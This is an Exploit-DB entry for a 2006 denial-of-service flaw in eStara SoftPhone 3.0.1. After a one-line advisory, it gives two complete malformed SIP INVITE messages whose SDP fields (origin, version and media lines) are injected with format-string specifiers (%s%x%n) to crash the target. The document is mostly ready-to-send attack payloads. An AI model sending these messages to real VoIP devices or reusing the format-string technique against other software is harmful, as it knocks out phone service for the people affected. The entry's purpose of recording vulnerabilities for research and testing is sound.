eStara SoftPhone 3.0.1 - SIP SDP Message Handling Format String Denial of Service

EDB-ID:

27210


Author:

ZwelL

Type:

dos


Platform:

Multiple

Date:

2006-02-14


source: https://www.securityfocus.com/bid/16629/info

eStara Smartphone is prone to multiple denial-of-service vulnerabilities when processing malformed VOIP headers. Successful exploitation will cause the device to crash.

INVITE sip:a@127.0.0.1 SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00003013z9hG4bK.00003B37
From: 3013 <sip:a@127.0.0.1>;tag=3013
To: zwell <sip:a@127.0.0.1>
Call-ID: 1295@172.16.3.6
CSeq: 21086 INVITE
Content-Type: application/sdp
Content-Length: 134

v=0
o=3013 3013 3013 %s%x%n IP4 172.16.3.6
s=Session SDP
c=IN IP4 172.16.3.6
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000


INVITE sip:a@127.0.0.1 SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00003013z9hG4bK.00003B37
From: 3013 <sip:a@127.0.0.1>;tag=3013
To: zwell <sip:a@127.0.0.1>
Call-ID: 1295@172.16.3.6
CSeq: 21086 INVITE
Content-Type: application/sdp
Content-Length: 134

%s=0
o=4085 4085 4085 IN IP4 172.16.3.6
s=Session SDP
c=IN IP4 172.16.3.6
t=0 0
m=audio 9876 %s%x%n 0
a=rtpmap:0 PCMU/8000